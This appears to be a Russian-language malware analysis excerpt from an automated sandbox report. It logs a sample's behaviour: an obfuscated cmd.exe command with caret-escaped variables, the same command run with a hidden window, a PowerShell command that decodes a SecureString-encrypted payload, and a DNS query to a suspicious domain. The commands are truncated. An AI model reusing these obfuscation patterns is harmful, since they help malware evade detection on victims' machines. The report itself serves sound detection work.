Техническая информация
- '<SYSTEM32>\cmd.exe' qOFURoCWKbpa qIdPCHcUHVZlEojkCNKYPXwsHzdZ AKiqjGn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %MbmaMJjnrWdAMMB%=nBqRwUM&&set %zaTVZPUSvdJzXv%=p&&set %ZtEEkzjWaz...
- DNS ASK id#######sfhasdbwejeasdh.com
- '<SYSTEM32>\cmd.exe' qOFURoCWKbpa qIdPCHcUHVZlEojkCNKYPXwsHzdZ AKiqjGn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %MbmaMJjnrWdAMMB%=nBqRwUM&&set %zaTVZPUSvdJzXv%=p&&set %ZtEEkzjWaz...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "( [RuNtimE.INTeRoPsErvIces.MarShAl]::ptrTOsTrIngaUto( [RUNTIme.iNteropSErvIces.marShAl]::SecUrESTrINgtOBStR( $('76492d1116743f0423413b16050a5345MgB8AEsAZgBBADMALwArAGcARABzAE0AaQBzAE8AMgBPAEEA...